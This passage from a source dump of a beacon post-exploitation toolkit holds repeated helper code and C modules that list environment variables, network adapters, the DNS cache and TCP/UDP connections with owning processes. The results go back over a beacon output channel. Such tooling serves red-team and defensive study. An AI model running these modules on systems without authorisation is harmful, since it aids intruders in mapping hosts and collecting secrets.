    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/env/env.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "base.c"
#include <tchar.h>
#include <stdio.h>

void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
    dst[dstSize - 1] = '\0';
}

void getEnvs() {
    LPWSTR lpszVariable;
    LPWCH lpvEnv;


    // Get a pointer to the environment block.
    //lpvEnv = KERNEL32$GetEnvironmentStrings();
    lpvEnv = KERNEL32$GetEnvironmentStringsW();

    internal_printf("Gathering Process Environment Variables:\n\n");

    // If the returned pointer is NULL, exit.
    if (lpvEnv == NULL)
    {
        BeaconPrintf(CALLBACK_ERROR, "GetEnvironmentStrings failed.");
        return;
    }

    // Variable strings are separated by NULL byte, and the block is
    // terminated by a NULL byte.
    lpszVariable = (LPWSTR) lpvEnv;

    while (*lpszVariable)
    {
        SIZE_T envLength = KERNEL32$lstrlenW(lpszVariable);
        char * convertedEnv = intAlloc(envLength + 1);
        ConvertUnicodeStringToChar(lpszVariable, envLength + 1, convertedEnv, envLength + 1);
        internal_printf("%s\n", convertedEnv);
        lpszVariable += KERNEL32$lstrlenW(lpszVariable) + 1;
        intFree(convertedEnv);
    }
    return;
}

VOID go()
{

    if(!bofstart())
    {
        return;
    }

    getEnvs();

    printoutput(TRUE);
    bofstop();
};

================================================
FILE: SAL-BOF/ipconfig/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/ipconfig/ipconfig.c
================================================
#include <windows.h>
#include <iphlpapi.h>
#include "bofdefs.h"
#include "base.c"

typedef  DWORD (*getadaptinfo)(LPVOID, PULONG);
typedef DWORD (*getnetparms)(LPVOID, PULONG);

void getIPInfo(){
    IP_ADAPTER_INFO * info = intAlloc(sizeof(IP_ADAPTER_INFO) * 32); // have to keep stack < 4K
    PIP_ADAPTER_INFO p = NULL;
    PFIXED_INFO pFixedInfo = NULL;
    PIP_ADDR_STRING pIPAddr;
    ULONG netOutBufLen = 0;
    ULONG ulOutBufLen = sizeof(IP_ADAPTER_INFO) * 32;
    DWORD ret;
    int i = 0;


    ret = IPHLPAPI$GetAdaptersInfo(info, &ulOutBufLen);
    if (ret != ERROR_SUCCESS) {
		BeaconPrintf(CALLBACK_ERROR, "could not get network adapter info");
        goto END;
    }
    if(IPHLPAPI$GetNetworkParams(pFixedInfo, &netOutBufLen) == ERROR_BUFFER_OVERFLOW){
        pFixedInfo = (FIXED_INFO *)intAlloc(netOutBufLen);
        if (pFixedInfo == NULL)
        {

			BeaconPrintf(CALLBACK_ERROR, "could not get network adapter info");
            goto END;
        }
        if (IPHLPAPI$GetNetworkParams(pFixedInfo, &netOutBufLen) != NO_ERROR)
        {
			BeaconPrintf(CALLBACK_ERROR, "could not get network adapter info");
            goto END;
        }

    }
	else
	{
		BeaconPrintf(CALLBACK_ERROR, "could not get network adapter info");
		goto END;
	}
    for (p = info; p; p = p->Next) {
			internal_printf( "%s\n", p->AdapterName);
			switch(p->Type){
			case MIB_IF_TYPE_ETHERNET:
				internal_printf(  "%s", "\tEthernet\n");
				break;
			default:
				internal_printf(  "%s", "\tUnknownType\n");
				break;
			}
			internal_printf(  "\t%s\n", p->Description);
			internal_printf(  "\t");
			for (i = 0; i < p->AddressLength; i++) {
				if (i == (p->AddressLength - 1)){
					internal_printf(  "%.2X\n", (int) p->Address[i]);
				}
				else{
					internal_printf(  "%.2X-", (int) p->Address[i]);
				}
			}
			internal_printf(  "\t%s\n", p->IpAddressList.IpAddress.String);
			
	}
	internal_printf(  "Hostname: \t%s\n", pFixedInfo->HostName);
	internal_printf(  "DNS Suffix: \t%s\n", pFixedInfo->DomainName);
	internal_printf(  "DNS Server: \t%s\n", pFixedInfo->DnsServerList.IpAddress.String);
	pIPAddr = pFixedInfo->DnsServerList.Next;
	while (pIPAddr){
		internal_printf(  "\t\t%s\n", pIPAddr->IpAddress.String);
		pIPAddr = pIPAddr->Next;
	}
	END:
    if (pFixedInfo){
        intFree(pFixedInfo);
        pFixedInfo = NULL;
    }
	if(info){
		intFree(info);
		info = NULL;
	}
    return;
}


VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	if(!bofstart())
	{
		return;
	}
	getIPInfo();
	printoutput(TRUE);
};



================================================
FILE: SAL-BOF/listdns/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/listdns/listdns.c
================================================
#include <windows.h>
#include <windns.h>
#include "bofdefs.h"
#include "base.c"

typedef struct _DNS_CACHE_ENTRY {
    struct _DNS_CACHE_ENTRY* pNext; // Pointer to next entry
    PWSTR pszName; // DNS Record Name
    unsigned short wType; // DNS Record Type
    unsigned short wDataLength; // Not referenced
    unsigned long dwFlags; // DNS Record Flags
} DNSCACHEENTRY, *PDNSCACHEENTRY;

int ListDnsCache(){
    char* dnsValue = NULL;
    int retcode = 0;
    PDNSCACHEENTRY pEntry = NULL, pHead = NULL, pPrev = NULL;
    DNSAPI$DnsGetCacheDataTable(&pEntry); //allocates memory into pEntry
    pHead = pEntry;
    if(pEntry == NULL || pEntry->pNext == NULL)
    {
        internal_printf("No results found\n");
        retcode = -1;
        goto CLEANUP;
    }
    pEntry = pEntry->pNext;
    while(pEntry) {
        dnsValue = Utf16ToUtf8((pEntry->pszName));
        internal_printf("Cache record: %s   | TYPE %d\n", dnsValue, pEntry->wType);
        if (dnsValue){
            intFree(dnsValue);
            dnsValue = NULL;
        }
        pPrev = pEntry;
        pEntry = pEntry->pNext;
        DNSAPI$DnsFree(pPrev, DnsFreeFlat);
    }

CLEANUP:
    if (pHead){
        DNSAPI$DnsFree(pHead, DnsFreeFlat);
        pEntry = NULL;
    }
    return retcode;
}

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
       
	if(!bofstart())
	{
		return;
	}
	ListDnsCache();
	printoutput(TRUE);
};




================================================
FILE: SAL-BOF/netstat/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/netstat/netstat.c
================================================
#include <windows.h>
#include <winbase.h>
#include <iphlpapi.h>
#include "bofdefs.h"
#include "base.c"

WINBASEAPI DWORD WINAPI IPHLPAPI$GetExtendedTcpTable(PVOID pTcpTable, PDWORD pdwSize, BOOL bOrder, ULONG ulAf, TCP_TABLE_CLASS TableClass, ULONG Reserved);
WINBASEAPI DWORD WINAPI IPHLPAPI$GetExtendedUdpTable(PVOID pUdpTable, PDWORD pdwSize, BOOL bOrder, ULONG ulAf, UDP_TABLE_CLASS TableClass, ULONG Reserved);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$QueryFullProcessImageNameA(HANDLE hProcess, DWORD dwFlags, LPSTR lpExeName, PDWORD lpdwSize);

#define HOSTNAMELEN 256
#define PORTNAMELEN 256
#define ADDRESSLEN 512

CHAR TcpState[][32] = {
    "???",
    "CLOSED",
    "LISTENING",
    "SYN_SENT",
    "SYN_RCVD",
    "ESTABLISHED",
    "FIN_WAIT1",
    "FIN_WAIT2",
    "CLOSE_WAIT",
    "CLOSING",
    "LAST_ACK",
    "TIME_WAIT",
    "DELETE_TCB"
};

char* GetIpHostName(BOOL Local, UINT IpAddr, CHAR Name[], int NameLen)
{
//  struct hostent *phostent;
    UINT nIpAddr;

    /* display dotted decimal */
    nIpAddr = WS2_32$htonl(IpAddr);
    MSVCRT$sprintf(Name, "%u.%u.%u.%u",
            (nIpAddr >> 24) & 0xFF,
            (nIpAddr >> 16) & 0xFF,
            (nIpAddr >> 8) & 0xFF,
            (nIpAddr) & 0xFF);
   return Name;
}

char* GetPortName(UINT Port, PCSTR Proto, CHAR Name[], INT NameLen)
{
    MSVCRT$sprintf(Name, "%u", WS2_32$htons((WORD)Port));
    return Name;
}

void GetNameByPID(DWORD processId, char* procName, DWORD *procNameLength) {

HANDLE hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION|PROCESS_VM_READ, FALSE, processId);
BOOL state;

	if (NULL != hProcess )
    	{
		state = KERNEL32$QueryFullProcessImageNameA(hProcess, 0, (LPSTR)procName, procNameLength);
		KERNEL32$CloseHandle( hProcess );
		if(state == TRUE) {
		    return;
		} else {
		    procName = "PERM\x00";
		    procNameLength = 0;
		    BeaconPrintf(CALLBACK_ERROR, "Failed to determine processName by PID %lu QueryFullProcessImageNameA failed", processId);
		}
    	} else {
		procName = "PERM\x00";
		procNameLength = 0;
	}
	return;
}

VOID ShowUdpTable()
{
//    PMIB_UDPTABLE udpTable;
    PMIB_UDPTABLE_OWNER_PID uTable;
    DWORD error, dwSize;
    DWORD i;
    CHAR HostIp[HOSTNAMELEN], HostPort[PORTNAMELEN];
    CHAR Host[ADDRESSLEN];

    /* Get the table of UDP endpoints */
    dwSize = 0;
    error = IPHLPAPI$GetExtendedUdpTable(NULL, &dwSize, TRUE, AF_INET, UDP_TABLE_OWNER_PID, 0);
    if (error != ERROR_INSUFFICIENT_BUFFER)
    {
        BeaconPrintf(CALLBACK_ERROR, "Failed to snapshot UDP endpoints.\n");
        return;
    }
    uTable = (PMIB_UDPTABLE_OWNER_PID) intAlloc(dwSize);
    error = IPHLPAPI$GetExtendedUdpTable(uTable, &dwSize, TRUE, AF_INET, UDP_TABLE_OWNER_PID, 0);
    if (error)
    {
        BeaconPrintf(CALLBACK_ERROR, "Failed to snapshot UDP endpoints table.\n");
        intFree(uTable);
        return;
    }

    /* Dump the UDP table */

    for (i = 0; i < uTable->dwNumEntries; i++)
    {
	MIB_UDPROW_OWNER_PID row = uTable->table[i];
        /* I've split this up so it's easier to follow */
        GetIpHostName(TRUE, row.dwLocalAddr, HostIp, HOSTNAMELEN);
        GetPortName(row.dwLocalPort, "tcp", HostPort, PORTNAMELEN);
        MSVCRT$sprintf(Host, "%s:%s", HostIp, HostPort);
	DWORD pid = row.dwOwningPid;
	char name[MAX_PATH];
	for (int i=0; i<MAX_PATH; i++) { name[i] = '\x00'; }
	DWORD size = MAX_PATH;
	DWORD* sizep = &size;
	GetNameByPID(pid, name, sizep);
	size = (*sizep);
        internal_printf("  %-6s %-22s %-22s %75s (%5i)\n", "UDP", Host,  "*:*", name, pid);
    }

    intFree(uTable);
}


void Netstat(){
//    PMIB_TCPTABLE tcpTable;
    PMIB_TCPTABLE_OWNER_PID ptTable;
    DWORD error, dwSize;
    DWORD i;
    CHAR HostIp[HOSTNAMELEN], HostPort[PORTNAMELEN];
    CHAR RemoteIp[HOSTNAMELEN], RemotePort[PORTNAMELEN];
    CHAR Host[ADDRESSLEN];
    CHAR Remote[ADDRESSLEN];

    dwSize = 0;
    error = IPHLPAPI$GetExtendedTcpTable(NULL, &dwSize, TRUE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0);
    if (error != ERROR_INSUFFICIENT_BUFFER)
    {
        BeaconPrintf(CALLBACK_ERROR, "Failed to snapshot TCP endpoints.\n");
        return;
    }
	// now that we know the buffer size, alloc it and call again with our struct
    ptTable = (PMIB_TCPTABLE_OWNER_PID) intAlloc(dwSize);
    error = IPHLPAPI$GetExtendedTcpTable(ptTable, &dwSize, TRUE, AF_INET, TCP_TABLE_OWNER_PID_ALL, 0);
    if (error)
    {
        BeaconPrintf(CALLBACK_ERROR, "Failed to snapshot TCP endpoints table.\n");
        intFree(ptTable);
        return;
    }
    internal_printf("Processing: %ld Entries\n", ptTable->dwNumEntries);
    internal_printf("  %-4s %-22s %-22s %11s %75s %5s\n", "PROTO", "SRC", "DST", "STATE", "PROCESS", "PID");

    for (i = 0; i < ptTable->dwNumEntries; i++)
    {
		MIB_TCPROW_OWNER_PID row = ptTable->table[i];
        /* If we aren't showing all connections, only display established, close wait
 *          * and time wait. This is the default output for netstat */
        if (1 ||(row.dwState ==  MIB_TCP_STATE_ESTAB)
            || (row.dwState ==  MIB_TCP_STATE_CLOSE_WAIT)
            || (row.dwState ==  MIB_TCP_STATE_TIME_WAIT))
        {
            /* I've split this up so it's easier to follow */
           GetIpHostName(TRUE, row.dwLocalAddr, HostIp, HOSTNAMELEN);
           GetPortName(row.dwLocalPort, "tcp", HostPort, PORTNAMELEN);
           MSVCRT$sprintf(Host, "%s:%s", HostIp, HostPort);

           if (row.dwState ==  MIB_TCP_STATE_LISTEN)
           {
               MSVCRT$sprintf(Remote, "LISTEN");
           }
           else
           {
